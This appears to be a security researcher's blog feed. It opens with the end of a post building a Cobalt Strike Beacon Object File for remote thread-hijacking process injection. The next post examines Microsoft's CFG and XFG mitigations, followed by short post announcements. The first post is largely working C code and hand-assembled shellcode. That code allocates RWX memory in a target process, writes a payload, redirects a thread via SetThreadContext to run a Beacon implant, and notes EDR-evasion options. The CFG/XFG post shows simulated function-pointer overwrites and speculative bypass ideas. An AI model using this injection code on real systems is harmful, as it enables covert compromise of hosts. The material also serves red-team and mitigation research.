Now, as we know, the original offset of the CONTEXT record from the very beginning of the entire NtContinue routine was 64-bytes. This is because we will copy the CONTEXT record directly after the 64-byte BYTE array, ntContinue, in our final buffer. Right now however, if we add 64-bytes, however, to the value in RCX, we will overshoot the CONTEXT record’s address. This is because we have executed quite a few instructions of the 64-byte shellcode, meaning we are now closer to the CONTEXT record, than we where when we started. To compensate for this, we can add the original 64-byte offset to the RCX register, and then subtract the contextOffset value, which represents the total amount of opcodes executed up until that point. This will give us the correct distance from our current location to the CONTEXT record.

// The address of the pop rcx instruction is now in RCX
// Adding the distance between the CONTEXT record and the current address in RCX
// add rcx, distance to CONTEXT record
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xc1;

// Value to be added to RCX
// The distance between the value in RCX (address of the 'pop rcx' instruction) and the CONTEXT record can be found by subtracting the amount of bytes executed up until the 'pop rcx' instruction and the original 64-byte offset
ntContinue[i++] = sizeof(ntContinue) - contextOffset;

This will place the address of the CONTEXT record into the RCX register. If this doesn’t compute, don’t worry. In a brief moment, we will step through everything inside of WinDbg to visually put things together.

The next goal is to set the RaiseAlert function argument to FALSE, which is a value of 0. To do this, again, we will use bitwise XOR.

// xor rdx, rdx
// Set to FALSE
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x31;
ntContinue[i++] = 0xd2;

All that is left now is to call NtContinue! Again, just like our call to CreateThread, we can resolve the address of the API inside of the current process and pass the return value to the remote process, as even though each process is mapped its own Windows DLLs, the addresses are the same across the system.

The mov rax instruction set is first.

// Place NtContinue into RAX
ntContinue[i++] = 0x48;
ntContinue[i++] = 0xb8;

We then resolve the address of NtContinue, Beacon Object File style.

// Although the thread is in a remote process, the Windows DLLs mapped to the Beacon process, although private, will correlate to the same virtual address
unsigned long long ntcontinueAddress = KERNEL32$GetProcAddress(KERNEL32$GetModuleHandleA("ntdll"), "NtContinue");

// Error handling. If NtContinue cannot be resolved, abort
if (ntcontinueAddress == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to resolve NtContinue.\n", KERNEL32$GetLastError());
}

Using the custom mycopy function, we then can copy the address of NtContinue at the correct index within the BYTE array, based on the value of i.

// Copy the address of NtContinue function address to the NtContinue routine buffer
mycopy(ntContinue + i, &ntcontinueAddress, sizeof(ntcontinueAddress));

// Update the counter with the correct offset the next bytes should be written to
i += sizeof(ntcontinueAddress);

At this point, things are as easy as just allocating some stack space for good measure and calling the value in RAX, NtContinue!

// Allocate some space on the stack for the call to NtContinue
// sub rsp, 0x20
ntContinue[i++] = 0x48;
ntContinue[i++] = 0x83;
ntContinue[i++] = 0xec;
ntContinue[i++] = 0x20;

// call NtContinue
ntContinue[i++] = 0xff;
ntContinue[i++] = 0xd0;

All there is left now is the stack alignment routine inside of the call to CreateThread! This alignment is to ensure the stack pointer is 16-byte aligned when the call from the NtContinue routine invokes the CreateThread routine.

Will The Stars Align?

The following routine will perform bitwise AND with the stack pointer, to ensure a 16-byte aligned RSP value inside of the CreateThread routine, by clearing out the last 4 bits of the address.

// Create 4 byte buffer to perform bitwise AND with RSP to ensure 16-byte aligned stack for the call to shellcode
// and rsp, 0FFFFFFFFFFFFFFF0
stackAlignment[0] = 0x48;
stackAlignment[1] = 0x83;
stackAlignment[2] = 0xe4;
stackAlignment[3] = 0xf0;

After the stack alignment is completed, all there is left to do is invoke malloc to create a large buffer that will contain all of our custom routines, inject the final buffer, and call SetThreadContext and ResumeThread to queue execution!

// Allocating memory for final buffer
// Size of NtContinue routine, CONTEXT structure, stack alignment routine, and CreateThread routine
PVOID shellcodeFinal = (PVOID)MSVCRT$malloc(sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread));

// Copy NtContinue routine to final buffer
mycopy(shellcodeFinal, ntContinue, sizeof(ntContinue));

// Copying CONTEXT structure, stack alignment routine, and CreateThread routine to the final buffer
// Allocation is already a pointer (PVOID) - casting to a DWORD64 type, a 64-bit address, in order to write to the buffer at a desired offset
// Using RtlMoveMemory for the CONTEXT structure to avoid casting to something other than a CONTEXT structure
NTDLL$RtlMoveMemory((DWORD64)shellcodeFinal + sizeof(ntContinue), &cpuRegisters, sizeof(CONTEXT));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT), stackAlignment, sizeof(stackAlignment));
mycopy((DWORD64)shellcodeFinal + sizeof(ntContinue) + sizeof(CONTEXT) + sizeof(stackAlignment), createThread, sizeof(createThread));

// Declare a variable to represent the final length
int finalLength = (int)sizeof(ntContinue) + (int)sizeof(CONTEXT) + sizeof(stackAlignment) + sizeof(createThread);

Before moving on, notice the call to RtlMoveMemory when it comes to copying the CONTEXT record to the buffer. This is due to mycopy being prototyped to access the source and destination buffers aschar* data types. However, RtlMoveMemory is prototyped to accept data types of VOID UNALIGNED, which indicates pretty much any data type can be used, which is perfect for us as CONTEXT is a structure, not a char*.

The above code creates a buffer with the size of our routines, and copies it into the routine at the correct offsets, with the NtContinue routine being copied first, followed by the preserved CONTEXT record of the hijacked thread, the stack alignment routine, and the CreateThread routine. After this, the shellcode is injected into the remote process.

First, VirtualAllocEx is called again.

// Inject the shellcode into the target process with read/write permissions
PVOID allocateMemory = KERNEL32$VirtualAllocEx(
  processHandle,
  NULL,
  finalLength,
  MEM_RESERVE | MEM_COMMIT,
  PAGE_EXECUTE_READWRITE
);

if (allocateMemory == NULL)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to allocate memory in the remote process. Error: 0x%lx\n", KERNEL32$GetLastError());
}

Secondly, WriteProcessMemory is called to write the shellcode to the allocation.

// Write shellcode to the new allocation
BOOL writeMemory = KERNEL32$WriteProcessMemory(
  processHandle,
  allocateMemory,
  shellcodeFinal,
  finalLength,
  NULL
);

if (!writeMemory)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to write memory to the buffer. Error: 0x%llx\n", KERNEL32$GetLastError());
}

After that, RSP and RIP are set before the call to SetThreadContext. RIP will point to our final buffer and upon thread restoration, the value in RIP will be executed.

// Allocate stack space by subtracting the stack by 0x2000 bytes
cpuRegisters.Rsp -= 0x2000;

// Change RIP to point to our shellcode and typecast buffer to a DWORD64 because that is what a CONTEXT structure uses
cpuRegisters.Rip = (DWORD64)allocateMemory;

Notice that RSP is subtracted by 0x2000 bytes. @zerosum0x0’s blog post on ThreadContinue adopts this feature, to allow breathing room on the stack in order for code to execute, and I decided to adopt it as well in order to avoid heavy troubleshooting.

After that, all there is left to do is to invoke SetThreadContext, ResumeThread, and free!

SetThreadContext

// Set RIP
BOOL setRip = KERNEL32$SetThreadContext(
  desiredThread,
  &cpuRegisters
);

// Error handling
if (!setRip)
{
  BeaconPrintf(CALLBACK_ERROR, "Error! Unable to set the target thread's RIP register. Error: 0x%lx\n", KERNEL32$GetLastError());
}

ResumeThread

// Call to ResumeThread()
DWORD resume = KERNEL32$ResumeThread(
  desiredThread
);

free

// Free the buffer used for the whole payload
MSVCRT$free(
  shellcodeFinal
);

Additionally, you should always clean up handles in your code - but especially in Beacon Object Files, as they are “sensitive”.

// Close handle
KERNEL32$CloseHandle(
  desiredThread
);
// Close handle
KERNEL32$CloseHandle(
processHandle
);

Debugger Time

Let’s use an instance of notepad.exe as our target process and attach it in WinDbg.

The PID we want to inject into is 7548 for our purposes. After loading our Aggressor Script developed earlier, we can use the command cThreadHijack 7548 TESTING, where TESTING is the name of the HTTP listener Beacon will interact with.

There we go, our BOF successfully ran. Now, let’s examine what we are working with in WinDbg. As we can see, the address of our final buffer is shown in the Current RIP: 0x1f027f20000 output line. Let’s view this in WinDbg.

Great! Everything seems to be in place. As is shown in the mov rax,offset ntdll!NtContinue instruction, we can see our NtContinue routine. The beginning of the NtContinue routine should call the address of the stack alignment and CreateThread shellcode, as mentioned earlier in this blog post. Let’s see what the address 0x000001f027f20510 references, which is the memory address being called.

Perfect! As we can see by the and rsp, 0FFFFFFFFFFFFFFFF0 instruction, along with the address of KERNEL32!CreateThreadStub, the NtContinue routine will first call the stack alignment and CreateThread routines. In this case, we are good to go! Let’s start now walking through execution of the code.

Upon SetThreadContext being invoked, which changes the RIP register to execute our shellcode, we can see that execution has reached the first call, which will invoke the stack alignment and CreateThread routines. Stepping through this call, as we know, will push a return address onto the stack. As mentioned previously, this will be the address of that next call 0x000001f027f2000a instruction. When the CreateThread routine returns, it will return to this address. After stepping through the instruction, we can see that the address of the next call is pushed onto the stack.

Execution then reaches the bitwise AND instruction. As we can see from the above image, and rsp, 0FFFFFFFFFFFFFFF0 is redundant, as the stack pointer is already 16-byte aligned (the last 4 bits are already set to 0). Stepping through the bitwise XOR operations, RCX and RDX are set to 0.

As we know from the CreateThread prototype, the lpStartAddress parameter is a pointer to our shellcode. Looking at the above image, we can see the third argument, which will be loaded into R8, is 0x1f027ee0000. Unassembling this address in the debugger discloses this is our Beacon implant, which was injected earlier! TO verify this, you can generate a raw Beacon stageless artifact in Cobalt Strike manually and run it through hexdump to verify the first few opcodes correspond.

After stepping through the instruction, the value is loaded into the R8 register. The next instruction sets R9 to 0 via xor r9, r9.

Additionally, [RSP + 0x20] and [RSP + 0x28] are set to 0, by copying the value of R9, which is now 0, to these locations. Here is what [RSP + 0x20] and [RSP + 0x28] look like before the mov [rsp + 0x20], r9 and mov [rsp + 0x28], r9 instructions and after.

After, CreateThread is placed into RAX and is called. Note CreateThread is actually CreateThreadStub. This is because most former kernel32.dll functions were placed in a DLL called KERNELBASE.DLL. These “stub” functions essentially just redirect execution to the correct KERNELBASE.dll function.

Stepping over the function, with p in WinDbg, places the CreateThread return value, into RAX - which is a handle to the local thread containing the Beacon implant.

After execution of our NtContinue routine is complete, we will receive the Beacon callback as a result of this thread.

Additionally, we can see that RSP is set to the first “real” instruction of our NtContinue routine. A ret instruction, which is what is in RIP currently, will take the stack pointer (RSP) and place it into RIP. Executing the return redirects execution back to the NtContinue routine.

As we can see in the image above, the next call instruction calls the pop rcx instruction. This call instruction, when executed, will push the address of the pop rcx instruction onto the stack, as a return address.

Executing the pop rcx instruction, we can see that RCX now contains the address, in memory, of the pop rcx instruction. This will be the base address used in the RVA calculations to resolve the address of the preserved CONTEXT record.

To verify if our offset is correct, we can use .cxr in WinDbg to divulge if the contiguous memory block located at RCX + 0x36 is in fact a CONTEXT record. 0x36 is chosen, as this is the value currently that is about to be added to RCX, as seen a few screenshots ago. Verifying with WinDbg, we can see this is the case.

If this would not have been the correct location of the CONTEXT record, this WinDbg extension would have failed, as the memory block would not have been parsed correctly.

Now that we have verified our CONTEXT record is in the correct place, we can perform the RVA calculation to add the correct distance to the CONTEXT record, meaning the pointer is then stored in RCX, fulfilling the PCONTEXT parameter of NtContinue.

Stepping through xor rdx, rdx, which sets the RaiseAlert parameter of NtContinue to FALSE, execution lands on the call rax instruction, which will call NtContinue.

Pressing g in the debugger then shows us quite a few of DLLs are mapped into notepad.exe.

This is the Beacon implant resolving needed DLLs for various function calls - meaning our Beacon implant has been executed! If we go back into Cobalt Strike, we can see we now have a Beacon in context of notepad.exe with the same PID of 7548!

Additionally, you will notice on the victim machine that notepad.exe is fully functional! We have successfully forced a remote thread to execute our payload and restored it, all in one go.

Final Thoughts

Obviously, this technique isn’t without its flaws. There are still IOCs for this technique, including invoking SetThreadContext, amongst other things. However, this does avoid invoking any sort of action that creates a remote thread, which is still useful in most situations. This technique could be taken further, perhaps with invoking direct system calls versus invoking these APIs, which are susceptible to hooking, with most EDR products.

Additionally, one thing to note is that since this technique suspends a thread and then resumes it, you may have to wait a few moments to even a few minutes, in order for the thread to get around to executing. Interacting with the process directly will force execution, but targeting Windows processes that perform execution often is a good target also to avoid long waits.

I had a lot of fun implementing this technique into a BOF and I am really glad I have a reason to write more C code! Like always: peace, love, and positivity :-).

Exploit Development: Between a Rock and a (Xtended Flow) Guard Place: Examining XFG

23 August 2020 at 00:00

Introduction

Previously, I have blogged about ROP and the benefits of understanding how it works. Not only is it a viable first-stage payload for obtaining native code execution, but it can also be leveraged for things like arbitrary read/write primitives and data-only attacks. Unfortunately, if your end goal is native code execution, there is a good chance you are going to need to overwrite a function pointer in order to hijack control flow. Taking this into consideration, Microsoft implemented Control Flow Guard, or CFG, as an optional update back in Windows 8.1. Although it was released before Windows 10, it did not really catch on in terms of “mainstream” exploitation until recent years.

After a few years, and a few bypasses along the way, Microsoft decided they needed a new Control Flow Integrity (CFI) solution - hence XFG, or Xtended Flow Guard. David Weston gave an overview of XFG at his talk at BlueHat Shanghai 2019, and it is pretty much the only public information we have at this time about XFG. This “finer-grained” CFI solution will be the subject of this blog post. A few things before we start about what this post is and what it isn’t:

  1. This post is not an “XFG internals” post. I don’t know every single low level detail about it.
  2. Don’t expect any bypasses from this post - this mitigation is still very new and not very explored.
  3. We will spend a bit of time understanding what indirect function calls are via function pointers, what CFG is, and why XFG is a very, very nice mitigation (IMO).

This is simply going to be an “organized brain dump” and isn’t meant to be a “learn everything you need to know about XFG in one sitting” post. This is just simply documenting what I have learned after messing around with XFG for a while now.

The Blueprint for XFG: CFG

CFG is a pretty well documented exploit mitigation, and I have done my fair share of documenting it as well. However, for completeness sake, let’s talk about how CFG works and its potential shortcomings.

Note that before we begin, Microsoft deserves recognition for being one of the leaders in implementing a Control Flow Integrity (CFI) initiative and among the first to actually release a CFI solution.

Firstly, to enable CFG, a program is compiled and linked with the /guard:cf flag. This can be done through the Microsoft Visual Studio tool cl (which we will look at later). However, more easily, this can be done by opening Visual Studio and navigating to Project -> Properties -> C/C++ -> Code Generation and setting Control Flow Guard to Yes (/guard:cf)

CFG at this point would now be enabled for the program - or in the case of Microsoft binaries, they would already be CFG enabled (most of them). This causes a bitmap to be created, which essentially is made up of all functions within the process space that are “protected by CFG”. Then, before an indirect function call is made (we will explore what an indirect call is shortly if you are not familiar), the function being called is sent to a special CFG function. This function checks to make sure that the function being called is a part of the CFG bitmap. If it is, the call goes through. If it isn’t, the call fails.

Since this is a post about XFG, not CFG, we will skip over the technical details of CFG. However, if you are interested to see how CFG works at a lower level, Morten Schenk has an excellent post about its implementation in user mode (the Windows kernel has been compiled with CFG, known as kCFG, since Windows 10 1703. Note that Virtualization-Base Security, or VBS, is required for kCFG to be enforced. However, even when VBS is disabled, kCFG has some limited functionality. This is beyond the scope of this blog post).

Moving on, let’s examine how an indirect function call (e.g. call [rax] where RAX contains a function address or a function pointer), which initiates a control flow transfer to a different part of an application, looks without CFG or XFG. To do this, let’s take a look at a very simple program that performs a control flow transfer.

Note that you will need Microsoft Visual Studio 2019 Preview 16.5 or greater in order to follow along.

Let’s talk about what is happening here. Firstly, this code is intentionally written this way and is obviously not the most efficient way to do this. However, it is done this way to help simulate a function pointer overwrite and the benefits of XFG/CFG.

Firstly, we have a function called void cfgTest() that just prints a sentence. This function is then assigned to a function pointer called void (*cfgTest1), which actually is an array. Then, in the main() function, the function pointer void (*cfgTest1) is executed. Since void (*cfgtest1) is pointing to void cfgTest(), this will actually just cause void (*cfgtest1) to just execute void cfgTest(). This will create a control flow transfer, as the main() function will perform a call to the void (*cfgTest1) function, which will then call the void cfgTest() function.

To compile with the command line tool cl, type in “x64 Native Tools Command Prompt for VS 2019 Preview” in the Start menu and run the program as an administrator.

This will drop you into a special Command Prompt. From here, you will need to navigate to the installation path of Visual Studio, and you will be able to use the cl tool for compilation.

Let’s compile our program now!

The above command essentially compiles the program with the /Zi flag and the /INCREMENTAL:NO linking option. Per Microsoft Docs, /Zi is used to create a .pdb file for symbols (which will be useful to us). /INCREMENTAL:NO has been set to instruct cl not to use the incremental linker. This is because the incremental linker is essentially used for optimization, which can create things like jump thunks. Jump thunks are essentially small functions that only perform a jump to another function. An example would be, instead of call function1, the program would actually perform a call j_function1. j_function1 would simply be a function that performs a jmp function1 instruction. This functionality will be turned off for brevity. Since our “dummy program” is so simple, it will be optimized very easily. Knowing this, we are disabling incremental linking in order to simulate a “Release” build (we are currently building “Debug” builds) of an application, where incremental linking would be disabled by default. However, none of this is really prevalent here - just a point of contention to the reader. Just know we are doing it for our purposes.

The result of the compilation command will place the output file, named Source.exe in this case, into the current directory along with a symbol file (.pdb). Now, we can open this application in IDA (you’ll need to run IDA as an administrator, as the application is in a privileged directory). Let’s take a look at the main() function.

Let’s examine the assembly above. The above function loads the void (*cfgTest1) function pointer into RCX. Since void (*cfgTest1) is a function pointer to an array, the value in RCX itself isn’t what is needed to jump to the array. Only when RCX is dereferenced in the call qword ptr [rcx+rax] instruction does program execution actually perform a control flow transfer to void (*cfgTest1)’s first index - which is void cfgTest(). This is why call qword ptr [rcx+rax] is being performed, as RAX is the position in the array that is being indexed.

Taking a look at the call instruction in IDA, we can see that clearly this will redirect program execution to void cfgTest().

Additionally, in WinDbg, we can see that Source!cfgTest1, which is a function, points to Source!cfgTest.

Nice! We know that our program will redirect execution from main() to void (*cfgTest1) and then to void cfgTest()! Let’s say as an attacker, we had an arbitrary write primitive and we were able to overwrite what void (*cfgTest1) points to. We could actually change where the application actually ends up calling! This is not good from a defensive perspective.

Can we mitigate this issue? Let’s go back and recompile our application with CFG this time and find out.

This time, we add /guard:cf as a flag, as well as a linking option.

Disassembling the main() function in IDA again, we notice things look a bit different.

Very interesting! Instead of making a call directly to void (*cfgTest1) this time, it seems as though the function __guard_disaptch_icall_fptr will be invoked. Let’s set a breakpoint in WinDbg on main() and see how this looks after invoking the CFG dispatch function.

After setting a breakpoint on the main() function, code execution hits the CFG dispatch function.

The CFG dispatch function then performs a dereference and jumps to ntdll!LdrpDispatchUserCallTarget.

We won’t get into the technical details about what happens here, as this post isn’t built around CFG and Morten’s blog already explains what will happen. But essentially, at a high level, this function will check the CFG bitmap for the Source.exe process and determine if the void cfgTest() function is a valid target (a.k.a if it’s in the bitmap). Obviously this function hasn’t been overwritten, so we should have no problems here. After stepping through the function, control flow should transfer back to the void cfgTest() function seamlessly.

Execution has returned back to the void cfgTest() function. Additionally what is nice, is the lack of overhead that CFG put on the program itself. The check was very quick because Microsoft opted to use a bitmap instead of indexing an array or some other structure.

You can also see what functions are protected by the CFG bitmap by using the dumpbin tool within the Visual Studio installation directory and the special Visual Studio Command Prompt. You can use the command dumpbin /loadconfig APPLICATION.exe to view this.

Let’s see if we can take this even further and potentially show why XFG is defintley a better/more viable option than CFG.

CFG: Potential Shortcomings

As mentioned earlier, CFG checks functions to make sure they are part of the “CFG bitmap” (a.k.a protected by CFG). This means a few things from an adversarial perspective. If we were to use VirtualAlloc() to allocate some virtual memory, and overwrite a function pointer that is protected by CFG with the returned address of the allocation - CFG would make the program crash.

Why? VirtualAlloc() (for instance) would return a virtual address of something like 0xdb0000. When the application in question was compiled with CFG, obviously this memory address wasn’t a part of the application. Therefore, this address wouldn’t be “protected by CFG” and the program would crash. However, this is not very practical. Let’s think about what an adversary tries to accomplish with ROP.

Adversaries want to return into a Windows API function like VirtualProtect() in order to dynamically change permissions of memory. What is interesting about CFG is that in addition to the program’s functions, all exported Windows functions that make up the “module” import list for a program can be called. For instance, the application we are looking at is called Source.exe Dumping the loaded modules for the application, we can see that KERNELBASE.dll, kernel32.dll, and ntdll.dll (which are the usual suspects) are loaded for this application.

Let’s see if/how this could be abused!

Let’s firstly update our program with a new function.

This program works exactly as the program before, except the function void protectMe2() is added in to add another user defined function to the CFG bitmap. Note that this function will never be executed, and that is poor from a programmer’s perspective. However, this function’s sole purpose is to just show another protected function. This can be verified again with dumpbin.

Here, we can see that Source!cfgTest1 still points to Source!cfgTest

Let’s recall what was said earlier about how CFG only validates if a function resides within the CFG bitmap or not. Let’s now perform a simulated arbitrary write condition in WinDbg to overwrite what Source!cfgTest points to, with Source!protectMe2.

The above command uses x to show the address of the Source!protectMe2 function and then uses dps to show that Source!cfgTest1 still points to Source!cfgTest1. Then, using ep, we overwrite the function pointer. dps once again verifies that the function overwrite has occurred.

Let’s now step through the program to see what happens. Program execution firstly hits the CFG dispatch function.

Looking at the RAX register, which is used to hold the address of the function CFG will check, we see it has been overwritten with Source!protectMe2 instead of Source!cfgTest.

Execution then hits ntdll!LdrpDispatchUserCallTarget. After walking the function, which validates if the in scope function resides within the CFG bitmap for the process, execution redirects to Source!protectMe2!

This is very interesting from an adversarial perspective, as we were successfully able to overwrite a function pointer and CFG didn’t terminate our process! The only caveat being that the function is a part of the current process’s CFG bitmap.

What is even more interesting, is that function pointers protected by CFG can be overwritten by any exported function at runtime! Let’s rework this example, but try to call a Windows API function like KERNELBASE!WriteProcessMemory.

First, we simulate the arbitrary write by overwriting Source!cfgTest1 with KERNELBASE!WriteProcessMemory.

Program execution passes through Source!__guard_dispatch_icall_fptr and ntdll!LdrpDispatchUserCallTarget and we can clearly see execution returns to KERNELBASE!WriteProcessMemory.

This shows that even with CFG enabled, it is still possible to call functions that have overwritten other functions. This is not good, as calls can still be made with malign intent. Additionally, calling functions of different types out of context may result in a type confusion or other programmatic behavioral problems.

Now that we have armed ourselves with an understanding of why CFG is an amazing start to solving the CFI problem, but yet still contains many shortcomings, let’s get into XFG and what makes it better and different.

XFG: The Next Era of CFI for Windows

Let’s start out by talking about what XFG is at a high level. After we go through some high level details about XFG, we will compile our program with XFG and walk through the dispatch function(s), as well as perform some simulated function pointer overwrites to see how XFG reacts and additionally see how XFG differs from CFG.

My last CrowdStrike blog post touches on XFG, but not in too much detail. XFG essentially is a more “hardened” version of CFG. How so? XFG, at compile time, produces a “type-based hash” of a function that is going to be called in a control flow transfer. This hash will be placed 8 bytes above the target function, and will be compared against a preserved version of that hash when an XFG dispatch function is executed. If the hashes match, control flow transfer is then passed to the in scope function that was checked. If the hashes differ, the program crashes.

Let’s take a look a bit more at this. Firstly, let’s compile our program with XFG!

Note that you will need Visual Studio 2019 Preview + at least Windows 10 21H1 in order to use XFG. Additionally, XFG is not found in the GUI compilation options.

Using the /guard:xfg flag in compilation and linking, we can enable XFG for our application.

Notice that even though it was not selected, CFG is still enabled for our application.

Let’s crack open IDA again to see how the main() function looks with the addition of XFG.

Very interesting! Firstly, we can see that R10 takes in the value of the XFG “type-based” hash. Then, a call is performed to the XFG dispatch call __guard_xfg_dispatch_icall_fptr. Note that the hash has been deemed “immutable” by Microsoft and cannot be modified by an attacker, due to its read only state.

In the image, below, the location of the XFG hash is at 00007ff7ded4110c

We can see that this address is executable (obviously) and readable - with the ability to write disabled.

Additionally, you can use the dumpbin tool to print out the functions protected by CFG/XFG. Functions protected by XFG are denoted with an X

Before we move on, one interesting thing to note is that the XFG hash is already placed 8 bytes above an XFG protected function BEFORE any code execution actually occurs.

For instance, Source!cfgTest is an XFG protected function. 8 bytes above this function is the hash seen in the previous image, but with an additional bit set.

We will see why this additional bit has been set when we step through the functions that perform XFG checks.

Moving on, let’s step through this in WinDbg to see what we are working with here, and how execution flow will go.

Firstly, execution lands on the XFG dispatch function.

This time, when the __guard_xfg_dispatch_icall_fptr function is dereferenced, a jump to the function ntdll!LdrpDispatchUserCallTargetXFG is performed.

Firstly, a bitwise OR of the XFG hash and 1 occurs, with the result placed in R10. In our case, this sets a bit in the XFG function hash.

Next, a test al, 0xf operation occurs, which performs a bitwise AND between the lower 8 bits of AX (AL) and 0xf.

As we can see from the image above, this sets the zero flag in our case. Additionally, now we have reached a possible jump within ntdll!LdrpDispatchUserCallTargetXFG

Since the zero flag has been set, we will NOT take the jump and instead move on to the next instruction, test ax, 0xFFF.

Stepping through test ax, 0xFFF, which will perform a bitwise AND with the lower 16 bits of EAX and 0xFFF, plus set the zero flag accordingly, we see that we have cleared the zero flag in the image below. This means the jump will not occur, and we continue to move deeper into the ntdll!LdrpDispatchUserCallTargetXFG function.

Finally, we land on the cmp instruction which compares the hash 8 bytes above RAX (our target function) with the hash preserved in R10.

The compare statement, because the values are equal, causes the zero flag to be set. This skips the next jump, and performs the final jump to our target function in RAX!

This is how a function protected by XFG is checked! Let’s now edit our code a bit and explore XFG a bit more.

Let’s Keep Going!

Recall that an XFG hash is made up of a function’s return type and any parameters. Let’s update our code to invoke another function of a different type.

We have changed the protectMe2() function to a function that returns an integer and takes a parameter of the type integer. This is different than our void cfgTest() function. We also set a function pointer, int (*cfgTest2) equal to the int protectMe2() function in order to create a new XFG hash for a different function type (int in this case). Let’s recompile our program and disassemble it in IDA to see how the two functions may vary from an XFG perspective.

Very interesting! As we can see from the above image, there are two different hashes now. The hash for our original function has remained the same. However, the hash for the int protectMe2() function is very different, but the last 12 bits of each hash in hexadecimal is 870 in our case. This interesting and may be worth noting.

Additionally, static and dynamic analysis both show that even before any code has executed, the actual hash that is placed 8 bytes above each function. Additionally, the hashes already have an additional bit set, just as we saw last time.

Let’s take this opportunity to showcase why XFG is significantly stronger than CFG.

Let’s simulate an arbitrary write again by overwriting what Source!cfgTest1 points to with Source!protectMe2.

After simulating the arbitrary write, we pick up execution in ntdll!LdrpDispatchUserCallTargetXFG again. Stepping through a few instructions, we once again land on the cmp instruction which checks to see if the preserved XFG hash matches the current XFG hash.

As we can see below, the hashes do not match!

Since the hashes do not match, this will cause XFG to determine a function pointer has been overwritten with something it should not have been overwritten with - and causes a program crash. Even though the function pointer was overwritten by another function within the same bitmap - XFG still will crash the process.

Let’s examine another scenario, with two functions of the same return type - but not the same amount of parameters.

To achieve this, our code has been edited to the following.

As we can see from the above image, we are using all integer functions now. However, the int cfgTest() function has two more parameters than the int protectMe2() function. Let’s compile and perform some static analysis in IDA.

The only difference between the two functions protected by XFG is the amount of parameters that int cfgTest() has, and yet the hashes are TOTALLY different. From a defensive perspective, it seems like even very similar functions are viewed as “very different”.

Additionally, we notice that the last 12 bits of the int cfgTest() hash have become 371 in hexadecimal instead of the previously mentioned 871 value. This means that XFG hashes seem to be unique until the last 8 bits. This is indicative of the hash only being unique up until about 56 bits.

As a sanity check and for completeness sake, let’s see what happens when two identical functions are assigned an XFG hash.

OMG Samesies!

Here is an edited version of our code, with two identical functions.

Disassembling the functions in IDA, we can see that the hashes this time are identical.

Obviously, since the hashing process for an XFG hash takes a function prototype and hashes it, the two hashes are going to be the same. I would not call this a flaw at all, because it is obvious Microsoft knew to this going in. However, I feel this is a nice win for Microsoft in terms of their overall CFI strategy because as David pointed out, this was very little overhead to the already existing CFG infrastructure.

However, from an adversarial standpoint - it must be said. XFG functions can be overwritten, so long as the function is basically an identical prototype of the original function.

Potential Bypasses?

As mentioned above, utilizing functions of identical prototypes generates identical XFG hashes. Knowing this, it seems as though it could be possible to overwrite a function with an identical function of the same prototype. This is SIGNIFICANTLY stronger than CFG in terms of what functions can actually be called.

Let’s talk about one more (potential) additional potential bypass.

As we know, functions protected by XFG have an XFG hash placed above them (8 bytes above to be more specific). What would happen for instance, if we performed a function pointer overwrite and called into the middle of a function, like KERNELBASE!VirtualProtect.

As we can see from the above image, calling into the middle of this function shows us that these hex numbers are being interpreted as opcodes, not memory addresses. This means that if XFG checks if a function pointer is overwritten by KERNELBASE!VirtualProtect, it would load the address of this function into RAX per the usual routine for XFG/CFG function checks. Then, this address is dereferenced at an offset of negative 8 to perform the XFG check. When this dereference happens, since this address contains opcodes, the opcodes that are present when calling into the middle of the function will be used in the XFG check.

Let’s perform a function pointer overwrite.

Note that the machine was restarted in between screenshots, causing addresses to change (but the symbols will remain the same).

Next, let’s step through the XFG dispatch functions and reach the compare statement.

Hitting the compare statement, we can see that R10 contains the preserved XFG hash, while RAX just contains the address of KERNELBASE!VirtualProtect + 0x50.

Taking a look at RAX - 8, where the XFG check occurs, we can see that the opcodes that reside within KERNELBASE!VirutalProtect are being treated as the “compared hash”.

Although this compare will fail, this brings up an interesting point.

Since calling into a middle of a function results in the function’s data being treated as opcodes and not memory addresses (usually), it may be possible for an adversary to utilize an arbitrary read/write primitive to do the following.

  1. Locate the XFG hash for a function you want to overwrite
  2. Perform a loop to dereference the process space’s memory and look for patterns that are identical to the XFG hash (remember, we still have to abide by CFG’s rules and choosing a function exported by the application or a function that is additionally located in the same bitmap)
  3. Overwrite the function pointer with any viable candidates

Although you most likely are going to be very hard pressed to find anything identical to the hash in terms of opcodes in the middle of a function AND additionally make whatever you find useful from an attacker’s perspective, this is still possible it seems.

Final Thoughts

I think personally that XFG is an awesome mitigation and I am excited to see how people get creative with the solution. However, until CET comes into play, overwriting return addresses on the stack seems like it will still be fair game. I think the combination of XFG and CET is going to be very interesting for exploitation in the future. I think XFG is a great and pretty creative mitigation. However, it has yet to be seen yet how it performs against Indirect Branch Tracking (IBT), which is CET’s forward-edge protection. All together, I think Microsoft has done a great thing with XFG by implementing it and not letting all of the work done with CFG go to waste.

As always! Peace, love, and positivity :-)

The Current State of Exploit Development, Part 2

20 August 2020 at 00:00

CrowdStrike Blog

Today I am very happy to have released my second blog for CrowdStrike! This blog, which builds off of my last one, talks about some additional mitigations like ACG, XFG, and VBS/HVCI which have made exploitation more expensive and time consuming. This blog rounds out the series and I hope you have found it useful! I learned a lot when I put this two part series together.

You can find the blog here. Enjoy!

The Current State of Exploit Development, Part 1

6 August 2020 at 00:00

CrowdStrike Blog

As you may or may not know, I work at CrowdStrike for my day job. I am also apart of the red team and do not do any official exploit development/vulnerability research. I wanted to address why binary exploits often aren’t as used anymore in typical red team toolkits and explain although the impact of a binary exploit, especially in the kernel, is far more effective than typical red team TTPs - is the return on investment worth it? I would love to see, personally, some red team research shift towards kernel exploits for local privilege escalation - which is often one of the more difficult parts of a penetration tests. But is binary exploitation even worth it at this point for red team work? Let’s find out!

Enjoy! Part 1

Exploit Development: Playing ROP’em COP’em Robots with WriteProcessMemory()

11 July 2020 at 00:00

Introduction

The other day on Twitter, I received a very kind and flattering message about a previous post of mine on the topic of ROP. Thinking about this post, I recall utilizing VirtualProtect() and disabling ASLR system wide to bypass DEP. I also used an outdated debugger, Immunity Debugger at the time, and I wanted to expand on my previous work, with a little bit of a less documented ROP technique and WinDbg.

Why is ROP Important?

